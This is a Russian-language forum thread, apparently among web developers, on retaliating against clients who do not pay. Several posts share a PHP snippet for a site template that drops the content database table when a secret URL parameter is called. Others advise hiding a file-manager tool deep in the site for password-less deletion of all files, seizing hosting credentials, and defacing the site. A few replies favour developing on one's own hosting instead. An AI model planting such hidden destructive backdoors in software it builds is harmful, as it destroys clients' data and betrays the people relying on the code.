Как боритесь с нечестными клиентами? - Флейм

Думаю многие из вас, встречали клиентов которые просят разработать сайт на своем хостинге и домене. Таким образом если клиент не совсем честный, то может пресечь вам все возможные доступы, и оставить Вас без оплаты после разработки сайта. Как в таком случае можно бороться с клиентом? И есть ли какие то "черные хода" для разработчика?

1 - делать бекдор, убивающий по запросу БД и файлы (через обращения браузера) - нехорошее решение
2 - разрабатывать и тестировать на своей площадке, переносить только после оплаты - хорошее решение

Самый простой вариант:

в индекс шаблона пишем


Теперь по запросу http://site.ru?task=qwerty - уничтожается таблица контента.

Самый простой вариант:
в индекс шаблона пишем

самый простой, но элементарно грамотный человек это вычистит.
Я обычно делаю в виде отдельного файла, запрятанного в глубине движка, чтобы хрен достанешь
Ну и рекурсивно обработать все заданные каталоги, чтобы снести полностью, недавно с Era обсуждали подобную штуку

Самый простой вариант:

в индекс шаблона пишем

Код

$task = $_REQUEST['task'];

switch ($task) {
     case 'qwerty':
         $database->setQuery("DROP TABLE #__content");
         $database->query();
          break;
     default:
//тут собственно код шаблона
          break;
}

Теперь по запросу http://site.ru?task=qwerty - уничтожается таблица контента.

а какой прикол? грамотный заказчик может сделать копию базы а потом и обнаружить эту фишку


Ну конечно всё зависит от грамотности человека. Я например не даю пароль в админку до оплаты проекта. Если оплата не поступет в течении нескольких дней, делаю себе копию и полностью стираю сайт. Иногда если проект дорогой, то просто у хостера меняю временно контактный емаил и пароль доступа в панель и фтп

и ещё забыл, есть очень прикольный файлик (убица файлов у хостера). Ложу его далеко и глубоко. Вызов этого фала даёт без пароля доступ ко всем файлам сайта, можно удалить всё нафиг. Пользоваться не приходилось, но можно

официальная страничка разработчика http://phpfm.sourceforge.net/

отлично) Будем бороться 

а можно как-то распологать сайт на хостинге клиента, но что-бы какие-то важные файлы подключались с моего хостинга?

или кодировать часть файлов?

Ну можешь БД держать у себя на хосте ....
Главное правило: утром деньги - вечером стулья

Наверно кое-где идет обсуждение "Как боритесь с нечестными вебмастерами?"

и ещё забыл, есть очень прикольный файлик (убица файлов у хостера). Ложу его далеко и глубоко. Вызов этого фала даёт без пароля доступ ко всем файлам сайта, можно удалить всё нафиг. Пользоваться не приходилось, но можно

А если поподробнее об этом?

Очень мощная вещь, для удаления файлов на хостинге, скачать здесь

Ого... я вот НИ РАЗУ не заливал ни бэкдоров, ни заплаток не делал...
Я что один такой белый и пушистый?

Очень мощная вещь, для удаления файлов на хостинге, скачать здесь

palexa пасиб, попробую (плюсы пока ставить не могу =) ), буду должен =)

Вот официальная страничка разработчика http://phpfm.sourceforge.net/ (продукт бесплатный).

Ого... я вот НИ РАЗУ не заливал ни бэкдоров, ни заплаток не делал...
Я что один такой белый и пушистый?

я тож такой! Если начинаются проблемы достаточно намекнуть что есть этот самый бэкдор и обычно все сразу устаканивается)

Ого... я вот НИ РАЗУ не заливал ни бэкдоров, ни заплаток не делал...
Я что один такой белый и пушистый?

Нет ты не одинок
Но у меня правило делать все у себя на хостинге, за редким исключением, если работки на 5 минут.
хех у одного заказчика не хватила денег рассчитаться, выделил времени три недели (блин добрый я какой) - если не оплатит, ну пожалеет, мне и бэкдоры нафиг не нужны. (остальное коммерческая тайна)

Самый простой вариант:

в индекс шаблона пишем

Код

$task = $_REQUEST['task'];

switch ($task) {
     case 'qwerty':
         $database->setQuery("DROP TABLE #__content");
         $database->query();
          break;
     default:
//тут собственно код шаблона
          break;
}

Теперь по запросу http://site.ru?task=qwerty - уничтожается таблица контента.

Подробней можно, где этот код вставить, на примере стандартного шаблона

ООО спасибки... как-то не додумался. Главное чтобы бекапа не было. Восстановят и вычислят.

о ответить между какими строками код впихнуть низзя ?

А мне больше вариант с PHP Filesystem Management Tool понравился,
и запихнуть его можно куда угодно, и найти его уж очень сложно будет

После поста volod3000 можно переименовать тему в: [Решено] Как боритесь с нечестными клиентами?

Ставьте плюс хорошему человеку.

+ конечно не жалко, но должна быть причина

+ конечно не жалко, но должна быть причина

Действительно помог нуждающимся.

кто помог, именно ?

volod3000, а если права на файлы выставлены только на чтение, как данная тулза может спасти ситуацию?

В данной тулзе можно изменить права )))

хм.. поподробнее бы как ей пользоваться..

Ну там всё само собой просто.

У меня не сработала тулза)) Хз даже почему. Ни удалить, ни переименовать файлы невозможно..
Правда редактировать можно, если на файл стоит chmod 666, а сменить права через утилиту не дает.

че там менять, смотри конфиг и рушай бд! или делай запрос на добавление в материалы строки "Владелец сайта гад не платит по счетам!"

В данном случае бд не задействована)))